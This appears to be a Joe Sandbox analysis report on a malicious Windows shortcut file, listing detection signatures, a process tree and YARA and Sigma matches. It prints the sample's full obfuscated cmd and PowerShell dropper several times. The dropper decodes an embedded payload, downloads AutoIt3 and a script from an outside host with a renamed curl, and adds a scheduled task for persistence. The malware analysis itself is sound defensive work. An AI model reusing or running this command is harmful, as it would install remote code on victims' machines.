Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
knfV5IVjEV.lnk

Overview

General Information

Sample name:knfV5IVjEV.lnk
(renamed file extension from none to lnk, renamed because original name is a hash value)
Original sample name:2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
Analysis ID:1430699
MD5:9d6c79c0b395cceb83662aa3f7ed0123
SHA1:65f5f7d127c478522e9669200de20000edcb6cfb
SHA256:2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Deletes itself after installation
Found URL in windows shortcut file (LNK)
Machine Learning detection for sample
Obfuscated command line found
Powershell creates an autostart link
Suspicious powershell command line found
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Very long command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Yara detected Obfuscated Powershell
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7464 cmdline: "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7548 cmdline: powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7680 cmdline: "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7732 cmdline: powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • attrib.exe (PID: 7964 cmdline: attrib +h c:\GSlLzFnTov MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • GSlLzFnTov.exe (PID: 7980 cmdline: GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0 MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
        • GSlLzFnTov.exe (PID: 8092 cmdline: GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1 MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
        • schtasks.exe (PID: 8168 cmdline: schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • attrib.exe (PID: 7832 cmdline: attrib +h c:\GSlLzFnTov MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • GSlLzFnTov.exe (PID: 7848 cmdline: GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0 MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • GSlLzFnTov.exe (PID: 7884 cmdline: GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1 MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • schtasks.exe (PID: 7948 cmdline: schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
knfV5IVjEV.lnkJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security
    knfV5IVjEV.lnkSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0xa97:$r1: po^w^e^rs^he^l^l
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmpSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0x354a:$r1: po^w^e^rs^he^l^l
    • 0x4c2a:$r1: po^w^e^rs^he^l^l
    00000003.00000002.1383867622.000001EFF7AE0000.00000004.00000020.00020000.00000000.sdmpSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0x1bdea:$r1: po^w^e^rs^he^l^l
    Process Memory Space: powershell.exe PID: 7548SUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0x52d6e:$r1: po^w^e^rs^he^l^l
    • 0x54354:$r1: po^w^e^rs^he^l^l
    • 0x54e10:$r1: po^w^e^rs^he^l^l
    Process Memory Space: powershell.exe PID: 7548INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x4ee83:$b1: ::WriteAllBytes(
    • 0x4f3ee:$b1: ::WriteAllBytes(
    • 0x5314c:$b1: ::WriteAllBytes(
    • 0x547a2:$b1: ::WriteAllBytes(
    • 0x551cd:$b1: ::WriteAllBytes(
    • 0x6a18e:$b1: ::WriteAllBytes(
    • 0x6f765:$b1: ::WriteAllBytes(
    • 0x6fe18:$b1: ::WriteAllBytes(
    • 0xc79cf:$b1: ::WriteAllBytes(
    • 0xc7f35:$b1: ::WriteAllBytes(
    • 0xc96fe:$b1: ::WriteAllBytes(
    • 0xc9c69:$b1: ::WriteAllBytes(
    • 0xd36cd:$b1: ::WriteAllBytes(
    • 0x16377d:$b1: ::WriteAllBytes(
    • 0x163d0a:$b1: ::WriteAllBytes(
    • 0x164421:$b1: ::WriteAllBytes(
    • 0x1649af:$b1: ::WriteAllBytes(
    • 0x16bd80:$b1: ::WriteAllBytes(
    • 0x174ffb:$b1: ::WriteAllBytes(
    • 0x1fda0c:$b1: ::WriteAllBytes(
    • 0x1fdf77:$b1: ::WriteAllBytes(
    Process Memory Space: powershell.exe PID: 7732INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x17bc2:$b1: ::WriteAllBytes(
    • 0x1812d:$b1: ::WriteAllBytes(
    • 0x8e680:$b1: ::WriteAllBytes(
    • 0x8ec0d:$b1: ::WriteAllBytes(
    • 0x8f2be:$b1: ::WriteAllBytes(
    • 0xc4848:$b1: ::WriteAllBytes(
    • 0xc4dcf:$b1: ::WriteAllBytes(
    • 0xc5552:$b1: ::WriteAllBytes(
    • 0xc5c76:$b1: ::WriteAllBytes(
    • 0x12d452:$b1: ::WriteAllBytes(
    • 0x12d9bd:$b1: ::WriteAllBytes(
    • 0x195a27:$b1: ::WriteAllBytes(
    • 0x195dca:$b1: ::WriteAllBytes(
    • 0x195ec5:$b1: ::WriteAllBytes(
    • 0x1fa456:$b1: ::WriteAllBytes(
    • 0x1fd8e8:$b1: ::WriteAllBytes(
    • 0x2011c8:$b1: ::WriteAllBytes(
    • 0x203dae:$b1: ::WriteAllBytes(
    • 0x204319:$b1: ::WriteAllBytes(
    • 0x20cab6:$b1: ::WriteAllBytes(
    • 0x20d36d:$b1: ::WriteAllBytes(
    SourceRuleDescriptionAuthorStrings
    amsi64_7732.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x50b:$b1: ::WriteAllBytes(
    • 0xc897:$s1: -join
    • 0x6043:$s4: +=
    • 0x6105:$s4: +=
    • 0xa32c:$s4: +=
    • 0xc449:$s4: +=
    • 0xc733:$s4: +=
    • 0xc879:$s4: +=
    • 0xe012:$s4: +=
    • 0xe092:$s4: +=
    • 0xe158:$s4: +=
    • 0xe1d8:$s4: +=
    • 0xe3ae:$s4: +=
    • 0xe432:$s4: +=
    • 0x40ac:$e4: Get-WmiObject
    • 0x429b:$e4: Get-Process
    • 0x42f3:$e4: Start-Process

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3", CommandLine: "C:\Windows\System32\cm
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;, CommandLine: powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function 